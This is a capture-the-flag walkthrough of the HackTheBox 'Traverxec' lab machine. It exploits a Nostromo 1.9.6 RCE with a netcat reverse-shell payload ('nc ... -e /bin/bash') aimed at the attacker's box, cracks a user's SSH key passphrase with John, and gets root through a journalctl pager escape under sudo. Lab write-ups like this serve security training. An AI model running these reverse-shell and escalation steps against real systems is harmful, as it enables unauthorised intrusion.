Hack The Box
HackTheBox “Traverxec” Walkthrough
Traverxec, an easy-level Linux OS machine on HackTheBox, necessitating thorough enumeration and exploitation of the web server, Nostromo. The initial step involved capitalizing on a Remote Code Execution (RCE)…
Traverxec, an easy-level Linux OS machine on HackTheBox, necessitating thorough enumeration and exploitation of the web server, Nostromo. The initial step involved capitalizing on a Remote Code Execution (RCE) vulnerability using a python script we got through searchsploit. Subsequently, I leveraged the knowledge of the user’s utilization of a web home directory on the server to pivot into their private files. The final phase entailed elevating privileges to root by exploiting the utilization of sudo in conjunction with journalctrl.

Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to full scan for open ports and services:

Visit the target at port 80.

Given that the target is operating a Nostromo 1.9.6 web server as we got from nmap scan results, we will check what would searchsploit tell us.

We get an exploit that corresponds precisely to the version. Let’s download it.

Let’s run it.

Exploitation:
We will initiate the process by deploying the following command as a payload argument for the Python script:
nc 10.10.14.8 4343 -e /bin/bash
However, let’s set up a listener.

Run the script.

Check the listener.

Privilege Escalation:
Since we have a Nostromo web server, let’s have a look around and check its conf folder.

The home directory of David possesses restricted readability for us; nonetheless, it is feasible to directly cd into the folders referenced within the conf file above. Let’s have a look at the public_www folder.

We are gonna need to extract this backup folder, so, let’s cp it to /tmp and then extract.

Check id_rsa.
www-data@traverxec:/tmp$ cat home/david/.ssh/id_rsacat home/david/.ssh/id_rsa[Redacted: rsa private key material from the authorized lab has been removed from this archive.]We transfer the target file to our attack box, where we utilize the ssh2john tool to convert it into a format that can be processed by John. Subsequently, we initiate the John to perform the password cracking process on the converted file.

We ssh into the target using the id_rsa and the passphrase we cracked “hunter”.

Let’s have a look around David’s home folder.

Run server-stats.sh.

server-stats.sh.
david@traverxec:~$ cat /home/david/bin/server-stats.sh #!/bin/bashcat /home/david/bin/server-stats.headecho "Load: `/usr/bin/uptime`"echo " "echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"echo " "echo "Last 5 journal log lines:"/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/catAfter reviewing the information within the ‘server-stats.sh’ file, it appears that the user ‘david’ possesses permissions to execute ‘journalctl’ with root. This signifies that I have the capability to employ the subsequent command with elevated privileges:
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
As per the details provided in GTFOBins, an opportunity presents itself to break free from the pager using the!/bin/bash. It is worth noting to minimize the shell window as small as possible to be able to type the command.

Now, we can escape it with !/bin/bash.

Cheers.